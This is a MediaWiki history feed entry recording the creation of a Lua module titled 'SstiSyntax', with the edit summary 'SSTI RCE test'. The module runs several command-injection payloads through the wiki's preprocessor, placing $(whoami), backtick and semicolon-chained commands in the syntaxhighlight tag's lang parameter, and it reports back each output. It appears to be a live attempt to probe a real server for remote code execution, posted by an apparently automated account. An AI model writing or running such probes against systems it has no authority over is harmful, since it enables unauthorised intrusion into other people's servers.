http://120.55.36.65/w/index.php?action=history&feed=atom&title=%E6%A8%A1%E5%9D%97%3ASstiSyntax 2026-05-13T20:25:03Z 本wiki上该页面的版本历史 MediaWiki 1.40.0 http://120.55.36.65/w/index.php?title=%E6%A8%A1%E5%9D%97:SstiSyntax&diff=947&oldid=prev 2026-05-09T05:58:46Z

<p>SSTI RCE test</p> <p><b>新页面</b></p><div><br /> local p = {}<br /> function p.test(frame)<br /> local parent = frame:getParent()<br /> if not parent or not parent.preprocess then return &quot;no_parent&quot; end<br /> <br /> -- Test {{#tag:syntaxhighlight}} with command injection<br /> local payloads = {<br /> {&quot;baseline&quot;, &quot;{{#tag:syntaxhighlight|TEST_CODE|lang=python}}&quot;},<br /> {&quot;cmd_sub&quot;, &quot;{{#tag:syntaxhighlight|TEST_CODE|lang=$(whoami 2&gt;&amp;1)}}&quot;},<br /> {&quot;backtick&quot;, &quot;{{#tag:syntaxhighlight|TEST_CODE|lang=`whoami 2&gt;&amp;1`}}&quot;},<br /> {&quot;semicolon&quot;, &quot;{{#tag:syntaxhighlight|TEST_CODE|lang=python;whoami 2&gt;&amp;1;echo}}&quot;},<br /> {&quot;syntaxhighlight_tag&quot;, &quot;&lt;syntaxhighlight lang=\&quot;$(whoami 2&gt;&amp;1)\&quot;&gt;TEST_CODE&lt;/syntaxhighlight&gt;&quot;},<br /> }<br /> <br /> local results = {}<br /> for _, pl in ipairs(payloads) do<br /> local ok, out = pcall(parent.preprocess, parent, pl[2])<br /> results[#results+1] = pl[1] .. &quot;=&quot; .. tostring(out):sub(1,60)<br /> end<br /> return table.concat(results, &quot; | &quot;)<br /> end<br /> return p</div>

Bot93553